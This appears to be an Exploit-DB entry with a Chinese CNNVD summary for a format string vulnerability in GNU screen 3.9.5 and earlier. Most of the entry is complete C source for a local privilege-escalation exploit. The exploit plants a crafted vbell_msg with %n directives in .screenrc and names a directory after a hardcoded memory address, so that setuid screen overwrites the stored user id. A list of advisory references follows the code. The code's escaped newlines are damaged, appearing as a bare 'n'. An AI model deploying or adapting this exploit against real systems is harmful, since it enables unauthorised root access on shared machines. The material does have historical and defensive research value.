https://www.exploit-db.com/exploits/20191
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200012-148

screen3.9.5以及之前版本存在格式字符串漏洞。本地用户借助vbell_msg初始化变量中格式字符提升根目录特权。

source: http://www.securityfocus.com/bid/1641/info

Various format string vulnerabilities exist in versions 3.9.5 and prior of 'screen' that may allow local users to elevate their privileges. If screen is setuid root, it is possible to alter the contents of the variable which stores the user id.


/****************************************************************
*
*
*  Screen 3.7.6 (and others) local
exploit                                                                *

*  by
IhaQueR@IRCnet
*
*
*
****************************************************************/



#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>



#define TMPBUFSIZE 4096

#define SCREENRC "/usr/home/paul/.screenrc"
#define SCREEN "/usr/bin/screen"

#define AREP 1
#define BUFOFFSET 324
#define PADDING 3
#define WRITEADDR 0x807beb4


//  some offsets grabbed from 3.7.6
//  &real_uid, &real_gid, &eff_uid, &eff_gid own_uid
//  0x807beb4 0x807ab1c 0x807aab0 0x807aab4 0x807bea4
//  + 64  +64



int main(int argc, char** argv)
{
int i, l;
FILE* fp;
char buf[TMPBUFSIZE];
unsigned char adr[(AREP+2)*sizeof(unsigned)];
unsigned char* cp;
unsigned a, *p;


  if(argc != 2) {
   printf("USAGE %s offsetn", argv[0]);
   return 0;
  }

  l = atoi(argv[1]);
  printf("creating magic stringn");

  bzero(buf, TMPBUFSIZE);

/*  consume stack arguments */
  for(i=0; i<BUFOFFSET/4; i++)
   strcat(buf, "%.0d");

/*  finally write to adress */
//  for(i=0;i<9; i++)
   strcat(buf, "%n");

  if(fp = fopen(SCREENRC, "w")) {
   fprintf(fp, "vbell onn");
   fprintf(fp, "vbell_msg '%s'n", buf);
   fprintf(fp, "vbellwait 11111n");
   fclose(fp);
  }
  else {
   printf("ERROR: opening %sn", SCREENRC);
  }

/*  now create the magic dir... */
  bzero(adr, (AREP+2)*sizeof(unsigned));
  cp = adr;
  for(i=0; i<PADDING; i++) {
   *cp = 'p';
   cp++;
  }

  p = (unsigned*) cp;

  a = WRITEADDR;
  a = a + l;

  for(i=0; i<AREP; i++) {
   *p = a;
//   a += 4;
   p++;
  }

  *p = 0;

/* make dir and call screen */
  mkdir((char*)adr, 0x777);
  chdir((char*)adr);
  argv[1] = NULL;
  execv(SCREEN, argv);
}

来源:XF
名称:screen-format-string
链接:http://xforce.iss.net/static/5188.php
来源:BID
名称:1641
链接:http://www.securityfocus.com/bid/1641
来源:BUGTRAQ
名称:20000905screen3.9.5rootvulnerability
链接:http://www.securityfocus.com/archive/1/80178
来源:REDHAT
名称:RHSA-2000:058
链接:http://www.redhat.com/support/errata/RHSA-2000-058.html
来源:SUSE
名称:20000906screenformatstringparsingsecurityproblem
链接:http://www.novell.com/linux/security/advisories/adv6_draht_screen_txt.html
来源:MANDRAKE
名称:MDKSA-2000:044
链接:http://www.linux-mandrake.com/en/updates/MDKSA-2000-044.php3
来源:BUGTRAQ
名称:20000906Screen-3.7.6localcompromise
链接:http://archives.neohapsis.com/archives/bugtraq/2000-08/0530.html
来源:FREEBSD
名称:FreeBSD-SA-00:46
链接:ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-00:46.screen.asc